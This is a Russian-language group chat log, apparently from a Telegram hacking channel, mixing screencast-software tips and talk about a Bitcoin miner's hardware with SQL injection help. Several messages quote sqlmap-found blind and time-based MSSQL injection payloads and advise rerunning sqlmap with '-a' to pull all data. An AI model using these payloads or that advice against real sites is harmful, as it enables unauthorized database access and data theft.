Size: a a a

2018 August 27

p

psirh in Hacker May Cry
Parameter: id (GET)
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY
источник

Y

You in Hacker May Cry
MRL
Windows
Критерии?
источник

Y

You in Hacker May Cry
Просто есть screencast-o-matic.com, который просто записывает и обрезает, можно сохранить в файл или по ссылке
источник

M

MRL in Hacker May Cry
psirh
Parameter: id (GET)
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY
sqlmap -u ссылка/id' --random-agent
источник

p

psirh in Hacker May Cry
MRL
sqlmap -u ссылка/id' --random-agent
ну я такое уже делал, не понимаю тебя
источник

У

Утренняя Звезда in Hacker May Cry
MRL
Парни подскажите нормальную программу для записи скринкаста
obs попробуй.
источник

p

psirh in Hacker May Cry
MRL
sqlmap -u ссылка/id' --random-agent
все тоже выдает
источник

D

DeadBro in Hacker May Cry
MRL
Парни подскажите нормальную программу для записи скринкаста
obs заебись
источник

M

MRL in Hacker May Cry
Спасибо
источник

p

psirh in Hacker May Cry
Аноны, прошу вашей помощи. Возможно ли такое найти без sqlmap'ов и прочих программ такую уязвимость?:
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
name),5,1))>104) WAITFOR DELAY '0:0:1'--
qvAV&after=1523013041889&lang=de&_dc=1523013101769
источник

D

DeadBro in Hacker May Cry
psirh
Аноны, прошу вашей помощи. Возможно ли такое найти без sqlmap'ов и прочих программ такую уязвимость?:
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
name),5,1))>104) WAITFOR DELAY '0:0:1'--
qvAV&after=1523013041889&lang=de&_dc=1523013101769
Инъекции со слипами и дилеями - оче маловероятно
источник

D

DeadBro in Hacker May Cry
Инфа сотка, что какой-то скрипт
источник
2018 August 28

MC

Mr. Cat in Hacker May Cry
sr.luxint
Да я уже всё посмотрел. S5 — это не асик, а майнер, который сделан на основе охуя (70-80?) асиков BM1??? (хотя я даже в первых трёх символах не уверен, да не суть). Все они объединены в какую-то цепь и весь их кремний заточен на высчитывание хэшей. Анивей, принципиалочки или, что лучше, схемы архитектуры я так и не нашёл, но пнятненько одно: на верху всего этого порно сидит копия биглебона, хостит линь и какую-то, вполне возможно, проприетарненькую фирмварь для управления асиками. Ну и сопутствующей периферией, офк. Дальше я пошёл читать шота другое.
Исходя по прошивке это все детище bitmain
источник

k

kazgeek in Hacker May Cry
psirh
Аноны, прошу вашей помощи. Возможно ли такое найти без sqlmap'ов и прочих программ такую уязвимость?:
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
name),5,1))>104) WAITFOR DELAY '0:0:1'--
qvAV&after=1523013041889&lang=de&_dc=1523013101769
Sqlmap - средство автоматизации, а не поиска уязвимостей.
источник

M

MRL in Hacker May Cry
psirh
Parameter: id (GET)
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY
Вообще не врубаюсь что это выдало, где, при каких условиях и что ты хочешь. Скинь в ЛС ссылку либо скринами кидай что делаешь, чтобы понятней было
источник

M

MRL in Hacker May Cry
Если это выдало sqlmap после подбора/перебора то значит подтвердил vuln. В таком случае запусти команду заново с каким-нибудь ключом, например -а
источник

M

MRL in Hacker May Cry
Он начнет вытягивать все что может
источник

k

kazgeek in Hacker May Cry
М.б. ещё false positive
источник

NK

ID:531453784 in Hacker May Cry
@chelchela_com будет жить. Поприветствуем!
источник
2018 August 29

M

MRL in Hacker May Cry
источник